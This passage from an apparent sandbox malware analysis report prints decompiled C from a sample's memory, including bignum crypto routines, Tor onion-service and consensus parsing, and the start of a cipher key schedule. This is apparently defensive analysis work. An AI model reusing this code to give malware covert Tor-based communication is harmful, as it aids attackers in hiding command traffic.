							_t170 = _t170 + 0x10000;
						}
						_t127 = _t126 << 0x10;
						_t84 = _t83 + _t127;
						_t171 = _t170 + (_t126 >> 0x10);
						if(_t84 < _t127) {
							_t171 = _t171 + 1;
						}
						_t128 = _v20;
						_t85 = _t84 + _t128;
						if(_t85 < _t128) {
							_t171 = _t171 + 1;
						}
						_t129 =  *((intOrPtr*)(_t97 + 0xc));
						_t86 = _t85 + _t129;
						if(_t86 < _t129) {
							_t171 = _t171 + 1;
						}
						 *((intOrPtr*)(_t97 + 0xc)) = _t86;
						_t95 =  &(_t95[4]);
						_t97 = _t97 + 0x10;
						_a4 = _a4 - 4;
						_v16 = _t171;
					}
					if(_a4 == 0) {
						L48:
						return _v16;
					}
					_t96 = _t95 - _t97;
					do {
						_t130 =  *(_t96 + _t97);
						_t173 = _t130 & 0x0000ffff;
						_t153 = _t130 >> 0x10;
						_t174 = _t173 * _v8;
						_t154 = _t153 * _v12;
						_t89 = _t153 * _v8;
						_t134 = _t173 * _v12 + _t89;
						if(_t134 < _t89) {
							_t154 = _t154 + 0x10000;
						}
						_t135 = _t134 << 0x10;
						_t175 = _t174 + _t135;
						_t155 = _t154 + (_t134 >> 0x10);
						if(_t175 < _t135) {
							_t155 = _t155 + 1;
						}
						_t92 = _v16;
						_t176 = _t175 + _t92;
						if(_t176 < _t92) {
							_t155 = _t155 + 1;
						}
						_t93 =  *_t97;
						_t177 = _t176 + _t93;
						if(_t177 < _t93) {
							_t155 = _t155 + 1;
						}
						 *_t97 = _t177;
						_t97 = _t97 + 4;
						_t60 =  &_a4;
						 *_t60 = _a4 - 1;
						_v16 = _t155;
					} while ( *_t60 != 0);
					goto L48;
				}
				return 0;
			}

















































































    0x003a69e7
    0x003a69ed
    0x003a69f6
    0x003a69f8
    0x003a6a09
    0x003a6a0c
    0x003a6b82
    0x003a6a14
    0x003a6a16
    0x003a6a1c
    0x003a6a20
    0x003a6a2a
    0x003a6a2e
    0x003a6a32
    0x003a6a36
    0x003a6a38
    0x003a6a38
    0x003a6a40
    0x003a6a46
    0x003a6a48
    0x003a6a4c
    0x003a6a4e
    0x003a6a4e
    0x003a6a4f
    0x003a6a52
    0x003a6a54
    0x003a6a59
    0x003a6a5c
    0x003a6a5c
    0x003a6a5f
    0x003a6a61
    0x003a6a65
    0x003a6a67
    0x003a6a67
    0x003a6a6a
    0x003a6a6c
    0x003a6a6f
    0x003a6a75
    0x003a6a79
    0x003a6a83
    0x003a6a87
    0x003a6a8b
    0x003a6a8f
    0x003a6a91
    0x003a6a91
    0x003a6a99
    0x003a6a9f
    0x003a6aa1
    0x003a6aa5
    0x003a6aa7
    0x003a6aa7
    0x003a6aa8
    0x003a6aab
    0x003a6aad
    0x003a6ab2
    0x003a6ab5
    0x003a6ab5
    0x003a6ab8
    0x003a6abb
    0x003a6abf
    0x003a6ac1
    0x003a6ac1
    0x003a6ac4
    0x003a6ac7
    0x003a6aca
    0x003a6ad0
    0x003a6ad4
    0x003a6ade
    0x003a6ae2
    0x003a6ae6
    0x003a6aea
    0x003a6aec
    0x003a6aec
    0x003a6af4
    0x003a6afa
    0x003a6afc
    0x003a6b00
    0x003a6b02
    0x003a6b02
    0x003a6b03
    0x003a6b06
    0x003a6b08
    0x003a6b0d
    0x003a6b10
    0x003a6b10
    0x003a6b13
    0x003a6b16
    0x003a6b1a
    0x003a6b1c
    0x003a6b1c
    0x003a6b1f
    0x003a6b22
    0x003a6b25
    0x003a6b2b
    0x003a6b2f
    0x003a6b39
    0x003a6b3d
    0x003a6b41
    0x003a6b45
    0x003a6b47
    0x003a6b47
    0x003a6b4f
    0x003a6b55
    0x003a6b57
    0x003a6b5b
    0x003a6b5d
    0x003a6b5d
    0x003a6b5e
    0x003a6b61
    0x003a6b65
    0x003a6b67
    0x003a6b67
    0x003a6b68
    0x003a6b6b
    0x003a6b6f
    0x003a6b71
    0x003a6b71
    0x003a6b72
    0x003a6b75
    0x003a6b78
    0x003a6b7b
    0x003a6b7f
    0x003a6b7f
    0x003a6b93
    0x003a6bf3
    0x00000000
    0x003a6bf7
    0x003a6b95
    0x003a6b97
    0x003a6b97
    0x003a6b9a
    0x003a6ba0
    0x003a6ba4
    0x003a6bae
    0x003a6bb2
    0x003a6bb6
    0x003a6bba
    0x003a6bbc
    0x003a6bbc
    0x003a6bc4
    0x003a6bca
    0x003a6bcc
    0x003a6bd0
    0x003a6bd2
    0x003a6bd2
    0x003a6bd3
    0x003a6bd6
    0x003a6bda
    0x003a6bdc
    0x003a6bdc
    0x003a6bdd
    0x003a6bdf
    0x003a6be3
    0x003a6be5
    0x003a6be5
    0x003a6be6
    0x003a6be8
    0x003a6beb
    0x003a6beb
    0x003a6bee
    0x003a6bee
    0x00000000
    0x003a6b97
    0x00000000

    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 003A6BFB, Relevance: .2, Instructions: 183Crypto
    C-Code - Quality: 100%
    			E003A6BFB(unsigned int* __ecx, intOrPtr* __edx, signed int _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				unsigned int _t55;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				signed int _t63;
				void* _t64;
				intOrPtr _t65;
				signed int _t66;
				signed int _t67;
				void* _t68;
				intOrPtr _t69;
				signed int _t70;
				signed int _t71;
				void* _t72;
				intOrPtr _t73;
				signed int _t76;
				signed int _t79;
				intOrPtr* _t81;
				void* _t82;
				unsigned int _t85;
				unsigned int _t89;
				signed int _t90;
				unsigned int _t91;
				unsigned int _t95;
				signed int _t96;
				intOrPtr _t97;
				unsigned int _t98;
				unsigned int _t102;
				signed int _t103;
				signed int _t104;
				unsigned int _t105;
				unsigned int _t109;
				signed int _t110;
				intOrPtr _t111;
				unsigned int _t112;
				unsigned int _t116;
				signed int _t117;
				signed int _t119;
				signed int _t120;
				void* _t121;
				intOrPtr _t122;
				signed int _t123;
				signed int _t124;
				signed int _t125;
				signed int _t126;
				signed int _t127;
				intOrPtr _t128;
				signed int _t129;
				signed int _t130;
				signed int _t131;
				signed int _t132;
				signed int _t133;
				void* _t134;
				intOrPtr _t135;
				signed int _t139;
				signed int _t140;
				intOrPtr _t141;
				signed int _t143;
				signed int _t147;
				signed int _t151;
				signed int _t155;
				signed int _t156;
				signed int _t157;
				unsigned int* _t159;

				_v16 = _v16 & 0x00000000;
				_t159 = __ecx;
				_t81 = __edx;
				if(_a4 > 0) {
					_v8 = _t55 & 0x0000ffff;
					_v12 = _t55 >> 0x10;
					while((_a4 & 0xfffffffc) != 0) {
						_t85 =  *_t159;
						_t119 = _t85 & 0x0000ffff;
						_t139 = _t85 >> 0x10;
						_t120 = _t119 * _v8;
						_t140 = _t139 * _v12;
						_t58 = _t139 * _v8;
						_t89 = _t119 * _v12 + _t58;
						if(_t89 < _t58) {
							_t140 = _t140 + 0x10000;
						}
						_t90 = _t89 << 0x10;
						_t121 = _t120 + _t90;
						_t141 = _t140 + (_t89 >> 0x10);
						if(_t121 < _t90) {
							_t141 = _t141 + 1;
						}
						_t61 = _v16;
						_t122 = _t121 + _t61;
						_v20 = _t141;
						if(_t122 < _t61) {
							_v20 = _t141 + 1;
						}
						 *_t81 = _t122;
						_t91 = _t159[1];
						_t62 = _t91 & 0x0000ffff;
						_t123 = _t91 >> 0x10;
						_t63 = _t62 * _v8;
						_t124 = _t123 * _v12;
						_t143 = _t123 * _v8;
						_t95 = _t62 * _v12 + _t143;
						if(_t95 < _t143) {
							_t124 = _t124 + 0x10000;
						}
						_t96 = _t95 << 0x10;
						_t64 = _t63 + _t96;
						_t125 = _t124 + (_t95 >> 0x10);
						if(_t64 < _t96) {
							_t125 = _t125 + 1;
						}
						_t97 = _v20;
						_t65 = _t64 + _t97;
						_v16 = _t125;
						if(_t65 < _t97) {
							_v16 = _t125 + 1;
						}
						 *((intOrPtr*)(_t81 + 4)) = _t65;
						_t98 = _t159[2];
						_t66 = _t98 & 0x0000ffff;
						_t126 = _t98 >> 0x10;
						_t67 = _t66 * _v8;
						_t127 = _t126 * _v12;
						_t147 = _t126 * _v8;
						_t102 = _t66 * _v12 + _t147;
						if(_t102 < _t147) {
							_t127 = _t127 + 0x10000;
						}
						_t103 = _t102 << 0x10;
						_t68 = _t67 + _t103;
						_t128 = _t127 + (_t102 >> 0x10);
						if(_t68 < _t103) {
							_t128 = _t128 + 1;
						}
						_t104 = _v16;
						_t69 = _t68 + _t104;
						_v20 = _t128;
						if(_t69 < _t104) {
							_v20 = _t128 + 1;
						}
						 *((intOrPtr*)(_t81 + 8)) = _t69;
						_t105 = _t159[3];
						_t70 = _t105 & 0x0000ffff;
						_t129 = _t105 >> 0x10;
						_t71 = _t70 * _v8;
						_t130 = _t129 * _v12;
						_t151 = _t129 * _v8;
						_t109 = _t70 * _v12 + _t151;
						if(_t109 < _t151) {
							_t130 = _t130 + 0x10000;
						}
						_t110 = _t109 << 0x10;
						_t72 = _t71 + _t110;
						_t131 = _t130 + (_t109 >> 0x10);
						if(_t72 < _t110) {
							_t131 = _t131 + 1;
						}
						_t111 = _v20;
						_t73 = _t72 + _t111;
						if(_t73 < _t111) {
							_t131 = _t131 + 1;
						}
						 *((intOrPtr*)(_t81 + 0xc)) = _t73;
						_t159 =  &(_t159[4]);
						_t81 = _t81 + 0x10;
						_a4 = _a4 - 4;
						_v16 = _t131;
					}
					if(_a4 == 0) {
						L38:
						return _v16;
					}
					_t82 = _t81 - _t159;
					do {
						_t112 =  *_t159;
						_t132 = _t112 & 0x0000ffff;
						_t155 = _t112 >> 0x10;
						_t133 = _t132 * _v8;
						_t156 = _t155 * _v12;
						_t76 = _t155 * _v8;
						_t116 = _t132 * _v12 + _t76;
						if(_t116 < _t76) {
							_t156 = _t156 + 0x10000;
						}
						_t117 = _t116 << 0x10;
						_t134 = _t133 + _t117;
						_t157 = _t156 + (_t116 >> 0x10);
						if(_t134 < _t117) {
							_t157 = _t157 + 1;
						}
						_t79 = _v16;
						_t135 = _t134 + _t79;
						if(_t135 < _t79) {
							_t157 = _t157 + 1;
						}
						 *((intOrPtr*)(_t82 + _t159)) = _t135;
						_t159 =  &(_t159[1]);
						_t51 =  &_a4;
						 *_t51 = _a4 - 1;
						_v16 = _t157;
					} while ( *_t51 != 0);
					goto L38;
				}
				return 0;
			}







































































    0x003a6c01
    0x003a6c0b
    0x003a6c0d
    0x003a6c0f
    0x003a6c1f
    0x003a6c22
    0x003a6d6b
    0x003a6c2a
    0x003a6c2c
    0x003a6c32
    0x003a6c36
    0x003a6c40
    0x003a6c44
    0x003a6c48
    0x003a6c4c
    0x003a6c4e
    0x003a6c4e
    0x003a6c56
    0x003a6c5c
    0x003a6c5e
    0x003a6c62
    0x003a6c64
    0x003a6c64
    0x003a6c65
    0x003a6c68
    0x003a6c6a
    0x003a6c6f
    0x003a6c72
    0x003a6c72
    0x003a6c75
    0x003a6c77
    0x003a6c7a
    0x003a6c80
    0x003a6c84
    0x003a6c8e
    0x003a6c92
    0x003a6c96
    0x003a6c9a
    0x003a6c9c
    0x003a6c9c
    0x003a6ca4
    0x003a6caa
    0x003a6cac
    0x003a6cb0
    0x003a6cb2
    0x003a6cb2
    0x003a6cb3
    0x003a6cb6
    0x003a6cb8
    0x003a6cbd
    0x003a6cc0
    0x003a6cc0
    0x003a6cc3
    0x003a6cc6
    0x003a6cc9
    0x003a6ccf
    0x003a6cd3
    0x003a6cdd
    0x003a6ce1
    0x003a6ce5
    0x003a6ce9
    0x003a6ceb
    0x003a6ceb
    0x003a6cf3
    0x003a6cf9
    0x003a6cfb
    0x003a6cff
    0x003a6d01
    0x003a6d01
    0x003a6d02
    0x003a6d05
    0x003a6d07
    0x003a6d0c
    0x003a6d0f
    0x003a6d0f
    0x003a6d12
    0x003a6d15
    0x003a6d18
    0x003a6d1e
    0x003a6d22
    0x003a6d2c
    0x003a6d30
    0x003a6d34
    0x003a6d38
    0x003a6d3a
    0x003a6d3a
    0x003a6d42
    0x003a6d48
    0x003a6d4a
    0x003a6d4e
    0x003a6d50
    0x003a6d50
    0x003a6d51
    0x003a6d54
    0x003a6d58
    0x003a6d5a
    0x003a6d5a
    0x003a6d5b
    0x003a6d5e
    0x003a6d61
    0x003a6d64
    0x003a6d68
    0x003a6d68
    0x003a6d7c
    0x003a6dd3
    0x00000000
    0x003a6dd6
    0x003a6d7e
    0x003a6d80
    0x003a6d80
    0x003a6d82
    0x003a6d88
    0x003a6d8c
    0x003a6d96
    0x003a6d9a
    0x003a6d9e
    0x003a6da2
    0x003a6da4
    0x003a6da4
    0x003a6dac
    0x003a6db2
    0x003a6db4
    0x003a6db8
    0x003a6dba
    0x003a6dba
    0x003a6dbb
    0x003a6dbe
    0x003a6dc2
    0x003a6dc4
    0x003a6dc4
    0x003a6dc5
    0x003a6dc8
    0x003a6dcb
    0x003a6dcb
    0x003a6dce
    0x003a6dce
    0x00000000
    0x003a6d80
    0x00000000

    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 003A528D, Relevance: 43.8, APIs: 19, Strings: 10, Instructions: 271string
    C-Code - Quality: 59%
    			E003A528D(intOrPtr _a4, signed int* _a8, char* _a12) {
				signed int _v8;
				void* _v12;
				char* _v16;
				char* _v20;
				void** _v24;
				signed int _v28;
				char* _v32;
				void* _v36;
				char _v52;
				char* _t73;
				char* _t74;
				char* _t75;
				void* _t76;
				signed int _t78;
				void* _t79;
				void* _t84;
				char* _t87;
				char* _t91;
				char* _t94;
				int _t96;
				int _t101;
				intOrPtr _t102;
				void* _t103;
				unsigned int _t104;
				void* _t108;
				void* _t113;
				char* _t122;
				char* _t124;
				void* _t125;
				void* _t136;
				char* _t139;
				signed int _t140;
				signed int* _t141;
				void* _t143;
				intOrPtr _t150;
				void* _t158;
				void* _t159;
				signed int _t161;
				void _t173;
				void _t174;
				int _t175;
				void* _t176;
				signed int _t178;
				intOrPtr* _t179;
				void* _t183;
				intOrPtr _t190;
				intOrPtr* _t191;
				char* _t192;
				void* _t194;
				void* _t195;
				void* _t196;
				void* _t197;
				void* _t198;
				void* _t199;

				_t73 = strstr(_a12, "protocol-versions 2,3");
				_pop(_t143);
				if(_t73 != 0) {
					_t74 = strstr(_a12, "-----BEGIN MESSAGE-----\n");
					_t75 = strstr(_a12, "\n-----END MESSAGE-----");
					_t196 = _t195 + 0x10;
					_t136 =  &(_t74[0x18]);
					if(_t136 == 0 || _t75 == 0) {
						L35:
						_t76 = 0;
						goto L36;
					} else {
						_t175 = _t75 - _t136;
						if(_t175 <= 0) {
							goto L35;
						}
						_t4 = _t175 + 1; // 0x1
						_t78 = _t4;
						_v28 = _t78;
						_t79 =  *0x3b8538(_t78);
						_v36 = _t79;
						memcpy(_t79, _t136, _t175);
						 *((char*)(_v36 + _t175)) = 0;
						_t176 =  *0x3b8538(_v28);
						_v32 = _t176;
						memset(_t176, 0, _v28);
						_t84 = E003A3933(_v28, _t143, _v36, _t176);
						_t197 = _t196 + 0x28;
						if(_t84 == 0) {
							L34:
							 *0x3b8540(_v32);
							 *0x3b8540(_v36);
							goto L35;
						}
						_v8 = _v8 & 0x00000000;
						_v28 = _v28 & 0x00000000;
						_t139 = "-----BEGIN RSA PUBLIC KEY-----";
						_t87 = strstr(_t176 + 1, _t139);
						if(_t87 == 0) {
							L27:
							_t190 = _a4;
							L28:
							if(_v8 <= 0) {
								L31:
								_t178 = _v28;
								if(_t178 <= 0) {
									goto L34;
								}
								_t191 = _t190 + 0x1c;
								do {
									 *0x3b8540( *_t191);
									_t191 = _t191 + 0x20;
									_t178 = _t178 - 1;
								} while (_t178 != 0);
								goto L34;
							}
							_t140 = _v8;
							_t179 = _t190 + 0x18;
							do {
								 *0x3b8540( *_t179);
								_t179 = _t179 + 0x20;
								_t140 = _t140 - 1;
							} while (_t140 != 0);
							goto L31;
						}
						_t150 = _a4;
						_v24 = _t150 + 0x1c;
						_v20 = _t150 + 0x18;
						while(1) {
							_v12 = _t87;
							_t91 = strstr( &(_t87[1]), "-----END RSA PUBLIC KEY-----");
							_v16 = _t91;
							if(_t91 == 0) {
								break;
							}
							_t113 =  *0x3b8538(0x1000);
							 *_v20 = _t113;
							memset(_t113, 0, 0x1000);
							memcpy( *_v20, _v12, _v16 - _v12 + 0x1c);
							_v8 = _v8 + 1;
							_v20 =  &(_v20[0x20]);
							_t122 = strstr( &(_v16[1]), _t139);
							_t197 = _t197 + 0x24;
							if(_t122 == 0) {
								break;
							}
							_v12 = _t122;
							_t124 = strstr( &(_t122[1]), "-----END RSA PUBLIC KEY-----");
							_v16 = _t124;
							if(_t124 == 0) {
								break;
							}
							_t125 =  *0x3b8538(0x1000);
							 *_v24 = _t125;
							memset(_t125, 0, 0x1000);
							memcpy( *_v24, _v12, _v16 - _v12 + 0x1c);
							_v28 = _v28 + 1;
							_v24 =  &(_v24[8]);
							_t87 = strstr( &(_v16[1]), _t139);
							_t197 = _t197 + 0x24;
							if(_t87 != 0) {
								continue;
							}
							break;
						}
						if(_v8 != _v28 || _v8 == 0) {
							goto L27;
						} else {
							_t141 = _a8;
							 *_t141 =  *_t141 & 0x00000000;
							_t192 = "\n";
							_v20 = strtok(_v32, _t192);
							_t94 = strtok(0, _t192);
							_t198 = _t197 + 0x10;
							while(1) {
								_v24 = _t94;
								if(_t94 == 0) {
									break;
								}
								_t96 = sscanf(_v24, "onion-port %5s",  &_v52);
								_t198 = _t198 + 0xc;
								if(_t96 != 1) {
									L23:
									_v20 = _v24;
									_t94 = strtok(0, _t192);
									continue;
								}
								_t190 = _a4;
								_t101 = sscanf(_v20, "ip-address %15s", ( *_t141 << 5) + _t190);
								_t199 = _t198 + 0xc;
								if(_t101 != 1) {
									goto L28;
								}
								_t158 = ( *_t141 << 5) + _t190;
								_t183 = _t158 - 1;
								do {
									_t102 =  *((intOrPtr*)(_t183 + 1));
									_t183 = _t183 + 1;
								} while (_t102 != 0);
								_t103 =  &_v52;
								asm("movsw");
								_t194 = _t103;
								do {
									_t173 =  *_t103;
									_t103 = _t103 + 1;
								} while (_t173 != 0);
								_t104 = _t103 - _t194;
								_t159 = _t158 - 1;
								do {
									_t174 =  *(_t159 + 1);
									_t159 = _t159 + 1;
								} while (_t174 != 0);
								_t161 = _t104 >> 2;
								_t108 = memcpy(_t194 + _t161 + _t161, _t194, memcpy(_t159, _t194, _t161 << 2) & 0x00000003);
								_t198 = _t199 + 0x18;
								 *_t141 = _t108;
								_t192 = "\n";
								goto L23;
							}
							if( *_t141 != _v8) {
								goto L27;
							}
							 *0x3b8540(_v32);
							 *0x3b8540(_v36);
							_t76 = 1;
							L36:
							return _t76;
						}
					}
				}
				return _t73;
			}

























































    0x003a52a3
    0x003a52a6
    0x003a52a9
    0x003a52b8
    0x003a52c4
    0x003a52c6
    0x003a52c9
    0x003a52cc
    0x003a5564
    0x003a5564
    0x00000000
    0x003a52da
    0x003a52dc
    0x003a52e0
    0x00000000
    0x00000000
    0x003a52e6
    0x003a52e6
    0x003a52ea
    0x003a52ed
    0x003a52f6
    0x003a52f9
    0x003a5304
    0x003a5311
    0x003a5316
    0x003a5319
    0x003a5323
    0x003a5328
    0x003a532d
    0x003a5550
    0x003a5553
    0x003a555c
    0x00000000
    0x003a5563
    0x003a5333
    0x003a5337
    0x003a533b
    0x003a5343
    0x003a5349
    0x003a5519
    0x003a5519
    0x003a551c
    0x003a5520
    0x003a5537
    0x003a5537
    0x003a553c
    0x00000000
    0x00000000
    0x003a553e
    0x003a5541
    0x003a5543
    0x003a5549
    0x003a554c
    0x003a554d
    0x00000000
    0x003a5541
    0x003a5522
    0x003a5525
    0x003a5528
    0x003a552a
    0x003a5530
    0x003a5533
    0x003a5534
    0x00000000
    0x003a5528
    0x003a534f
    0x003a5358
    0x003a535b
    0x003a5363
    0x003a5363
    0x003a536d
    0x003a5371
    0x003a5376
    0x00000000
    0x00000000
    0x003a537d
    0x003a538a
    0x003a538c
    0x003a53a3
    0x003a53ab
    0x003a53ae
    0x003a53b5
    0x003a53b7
    0x003a53bc
    0x00000000
    0x00000000
    0x003a53be
    0x003a53c8
    0x003a53cc
    0x003a53d1
    0x00000000
    0x00000000
    0x003a53d4
    0x003a53e1
    0x003a53e3
    0x003a53fa
    0x003a5402
    0x003a5405
    0x003a540c
    0x003a540e
    0x003a5413
    0x00000000
    0x00000000
    0x00000000
    0x003a5413
    0x003a541f
    0x00000000
    0x003a542f
    0x003a542f
    0x003a5438
    0x003a543b
    0x003a5449
    0x003a544c
    0x003a544e
    0x003a54ee
    0x003a54ee
    0x003a54f3
    0x00000000
    0x00000000
    0x003a5468
    0x003a546a
    0x003a5470
    0x003a54dd
    0x003a54e3
    0x003a54e6
    0x00000000
    0x003a54ed
    0x003a5474
    0x003a5485
    0x003a5487
    0x003a548d
    0x00000000
    0x00000000
    0x003a5498
    0x003a549a
    0x003a549d
    0x003a549d
    0x003a54a0
    0x003a54a1
    0x003a54aa
    0x003a54ad
    0x003a54af
    0x003a54b1
    0x003a54b1
    0x003a54b3
    0x003a54b4
    0x003a54b8
    0x003a54ba
    0x003a54bb
    0x003a54bb
    0x003a54be
    0x003a54bf
    0x003a54c7
    0x003a54d4
    0x003a54d4
    0x003a54d6
    0x003a54d8
    0x00000000
    0x003a54d8
    0x003a54fe
    0x00000000
    0x00000000
    0x003a5503
    0x003a550c
    0x003a5516
    0x003a5566
    0x00000000
    0x003a5566
    0x003a541f
    0x003a52cc
    0x003a556a

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 003A4DC1, Relevance: 31.7, APIs: 11, Strings: 10, Instructions: 173string
    C-Code - Quality: 37%
    			E003A4DC1(char* _a4) {
				signed int _v8;
				intOrPtr* _v12;
				char* _v16;
				char* _v20;
				char* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char* _v36;
				intOrPtr* _t53;
				intOrPtr _t54;
				intOrPtr _t55;
				char* _t63;
				intOrPtr _t69;
				int _t70;
				intOrPtr _t72;
				intOrPtr _t73;
				void* _t75;
				int _t77;
				intOrPtr* _t78;
				intOrPtr _t79;
				intOrPtr _t80;
				char _t102;
				intOrPtr _t104;
				void* _t105;
				char* _t107;
				intOrPtr _t108;
				void* _t109;
				char* _t111;
				void* _t112;
				void* _t115;
				void* _t116;

				_v24 = 0;
				_t53 =  *0x3b8538(0x80);
				_v12 = _t53;
				_t54 =  *0x3b8538(0x80);
				_v32 = _t54;
				_t55 =  *0x3b8538(0x80);
				_t111 = "\n";
				_v28 = _t55;
				_v36 = 0;
				_v16 = strtok(_a4, _t111);
				_t107 = strtok(0, _t111);
				_t116 = _t115 + 0x1c;
				_v20 = _t107;
				if(_t107 == 0) {
					L24:
					_t112 = 0;
				} else {
					_v8 = _v8 & 0x00000000;
					L3:
					while(1) {
						if( *_t107 != 0x73 || _t107[1] != 0x20) {
							L20:
							_v36 = _v16;
							_v16 = _t107;
							_t63 = strtok(0, _t111);
							_v20 = _t63;
							if(_t63 != 0) {
								_t107 = _v20;
								continue;
							} else {
								_t80 = _v24;
								if(_t80 == 0) {
									goto L24;
								} else {
									 *0x3b8ac4 = _t80;
									_t112 = 1;
								}
							}
						} else {
							if(strstr(_t107, "HSDir") == 0) {
								if(strstr(_t107, "Valid") == 0 || strstr(_t107, "Running") == 0 || strstr(_t107, "Fast") == 0 || strstr(_t107, "Stable") == 0) {
									goto L20;
								} else {
									_t69 =  *0x3b8ac0; // 0x0
									 *((intOrPtr*)(_v8 + _t69 + 0x70)) = 1;
									goto L12;
								}
							} else {
								_t79 =  *0x3b8ac0; // 0x0
								 *(_v8 + _t79 + 0x70) =  *(_v8 + _t79 + 0x70) & 0x00000000;
								L12:
								_push(_v28);
								_t108 = _v12;
								_push(_v32);
								_push(_t108);
								_t70 = sscanf(_v36, "%*[^ ] %*[^ ] %27[^ ] %*[^ ] %*[^ ] %15[^ ] %5s");
								_t116 = _t116 + 0x14;
								if(_t70 != 3) {
									goto L24;
								} else {
									sprintf(_v8 +  *0x3b8ac0, "%s:%s", _v32, _v28);
									_t116 = _t116 + 0x10;
									_t109 = _t108 - 1;
									do {
										_t72 =  *((intOrPtr*)(_t109 + 1));
										_t109 = _t109 + 1;
									} while (_t72 != 0);
									_t73 =  *0x3b8ac0; // 0x0
									_t31 = _t73 + 0x18; // 0x18
									_push(_v8 + _t31);
									_push(_v12);
									asm("movsw");
									_t75 = 0x14;
									asm("movsb");
									if(E003A3933(_t75, _v8) != 0x14) {
										goto L24;
									} else {
										_push(_v12);
										_t77 = sscanf(_v16, "%*[^ ] %43[^ ]");
										_t116 = _t116 + 0xc;
										if(_t77 != 1) {
											goto L24;
										} else {
											_t78 = _v12;
											_t104 =  *0x3b8ac0; // 0x0
											_t38 = _t104 + 0x2c; // 0x2c
											_t105 = _v8 - _t78 + _t38;
											do {
												_t102 =  *_t78;
												 *((char*)(_t105 + _t78)) = _t102;
												_t78 = _t78 + 1;
											} while (_t102 != 0);
											_v24 = _v24 + 1;
											_v8 = _v8 + 0x74;
											_t107 = _v20;
											_t111 = "\n";
											goto L20;
										}
									}
								}
							}
						}
						goto L23;
					}
				}
				L23:
				 *0x3b8540(_v28);
				 *0x3b8540(_v32);
				 *0x3b8540(_v12);
				return _t112;
			}


































    0x003a4dd2
    0x003a4dd5
    0x003a4ddc
    0x003a4ddf
    0x003a4de6
    0x003a4de9
    0x003a4df5
    0x003a4dfe
    0x003a4e01
    0x003a4e08
    0x003a4e0d
    0x003a4e0f
    0x003a4e12
    0x003a4e17
    0x003a4fcb
    0x003a4fcb
    0x003a4e1d
    0x003a4e1d
    0x00000000
    0x003a4e26
    0x003a4e29
    0x003a4f7c
    0x003a4f82
    0x003a4f85
    0x003a4f88
    0x003a4f8c
    0x003a4f91
    0x003a4e23
    0x00000000
    0x003a4f97
    0x003a4f97
    0x003a4f9c
    0x00000000
    0x003a4f9e
    0x003a4fa0
    0x003a4fa5
    0x003a4fa5
    0x003a4f9c
    0x003a4e39
    0x003a4e49
    0x003a4e6a
    0x00000000
    0x003a4eb2
    0x003a4eb2
    0x003a4eba
    0x00000000
    0x003a4eba
    0x003a4e4b
    0x003a4e4b
    0x003a4e53
    0x003a4ec2
    0x003a4ec2
    0x003a4ec5
    0x003a4ec8
    0x003a4ecb
    0x003a4ed4
    0x003a4eda
    0x003a4ee0
    0x00000000
    0x003a4ee6
    0x003a4efb
    0x003a4f01
    0x003a4f04
    0x003a4f05
    0x003a4f05
    0x003a4f08
    0x003a4f09
    0x003a4f0d
    0x003a4f15
    0x003a4f19
    0x003a4f1a
    0x003a4f22
    0x003a4f26
    0x003a4f27
    0x003a4f32
    0x00000000
    0x003a4f38
    0x003a4f38
    0x003a4f43
    0x003a4f49
    0x003a4f4f
    0x00000000
    0x003a4f51
    0x003a4f51
    0x003a4f57
    0x003a4f5f
    0x003a4f5f
    0x003a4f63
    0x003a4f63
    0x003a4f65
    0x003a4f68
    0x003a4f69
    0x003a4f6d
    0x003a4f70
    0x003a4f74
    0x003a4f77
    0x00000000
    0x003a4f77
    0x003a4f4f
    0x003a4f32
    0x003a4ee0
    0x003a4e49
    0x00000000
    0x003a4e29
    0x003a4e26
    0x003a4fa6
    0x003a4fa9
    0x003a4fb2
    0x003a4fbb
    0x003a4fca

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 003AE97F, Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 71librarynetwork
    C-Code - Quality: 86%
    			E003AE97F() {
				char _v404;
				long _v408;
				char _t11;
				signed int _t12;
				_Unknown_base(*)()* _t20;
				signed int _t25;
				signed char _t28;
				struct HINSTANCE__* _t31;
				signed int _t39;
				void* _t41;

				_t41 = (_t39 & 0xfffffff8) - 0x194;
				_v408 = GetTickCount();
				_t11 = 0;
				do {
					 *((char*)(_t11 + 0x3b89b0)) = _t11;
					_t11 = _t11 + 1;
				} while (_t11 != 0x100);
				_t25 = 0;
				_t12 = 0;
				do {
					_t3 = _t12 + 0x3b89b0; // 0x0
					_t28 =  *_t3;
